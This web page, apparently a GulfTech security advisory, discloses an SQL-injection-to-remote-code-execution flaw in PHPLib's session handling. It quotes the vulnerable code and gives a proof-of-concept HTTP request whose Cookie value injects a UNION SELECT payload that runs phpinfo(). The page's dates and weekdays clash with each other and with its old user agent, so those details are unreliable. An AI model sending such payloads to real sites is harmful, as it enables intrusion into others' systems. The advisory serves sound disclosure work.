Friday February 15, 2022
Most Viewed Items
  1 PHPXMLRPC Library Remote Code Execution
  2 Mambo Multiple Vulnerabilities
  3 MySQL Eventum Multiple Vulnerabilities
  4 Multiple Invision Power Board Vulnerabilities
  5 Geeklog Remote Code Execution
  6 XMB Forums Multiple Vulnerabilities
  7 Gallery 2 Multiple Vulnerabilities
  8 phpRPC Library Remote Code Execution
  9 RunCMS Multiple Vulnerabilities
10 Kayako LiveResponse Multiple Vulnerabilities
Quick Search
You can use the form below to search our site. Just enter the keywords to search.
Home Archives Research
PHPLib Remote Code Execution
March 5, 2022
Vendor : PHPLib
Version : PHPLib <= 7.4
Risk : Remote Code Execution

The PHP Base Library aka PHPLib is a toolkit for PHP developers supporting them in the development of Web applications. The phpLib codebase can be found in a number of applications available today. Unfortunately some of the session emulation code is vulnerable to SQL Injection issues that in a worst case scenario can lead to remote code execution by using UNION and selecting arbitrary php code into an eval call. A new version og PHPLib has been released and users should upgrade their PHPLib libraries as soon as possible.

Remote Code Execution:
There are some serious security issues in phplib's session handling that may allow an attacker to perform a range of attacks such as SQL Injection, and/or Remote Code Execution.
## Propagate the session id according to mode and lifetime.
## Will create a new id if necessary. To take over abandoned sessions,
## one may provide the new session id as a parameter (not recommended).
function get_id($id = "") {
$this->name = $this->cookiename==""?$this->classname:$this->cookiename;
if ( "" == $id ) {
  switch ($this->mode) {
    case "get":
      $id = isset($HTTP_GET_VARS[$this->name]) ?
            $HTTP_GET_VARS[$this->name] :
            ( isset($HTTP_POST_VARS[$this->name]) ?
            $HTTP_POST_VARS[$this->name] :
            "") ;
    case "cookie":
      $id = isset($HTTP_COOKIE_VARS[$this->name]) ?
            $HTTP_COOKIE_VARS[$this->name] : "";
      die("This has not been coded yet.");
### do not accept user provided ids for creation
if($id != "" && $this->block_alien_sid) {   # somehow an id was provided by the user
   if($this->that->ac_get_value($id, $this->name) == "") {
      # no - the id doesn't exist in the database: Ignore it!
      $id = "";

The above code is from @ lines 85-121. The variable $id gets it's values from either GET or COOKIE and is never made safe before being passed to the function ac_get_value() which uses the variable in a query, thus allowing for SQL Injection. However, it is possible to manipulate the query in a way that php code is returned and passed to a vulnerable eval call.
GET /phplib/pages/index.php3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20060111 Firefox/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: Example_Session=' UNION SELECT 'cGhwaW5mbygpOw=='/*
If-Modified-Since: Sat, 18 Feb 2022 18:24:34 GMT
For example, the above request made to the index.php3 script that is shipped with phplib will successfully execute the phpinfo call.

PHPLib 7.4a has been released to address these issues.

James Bercegay of the GulfTech Security Research Team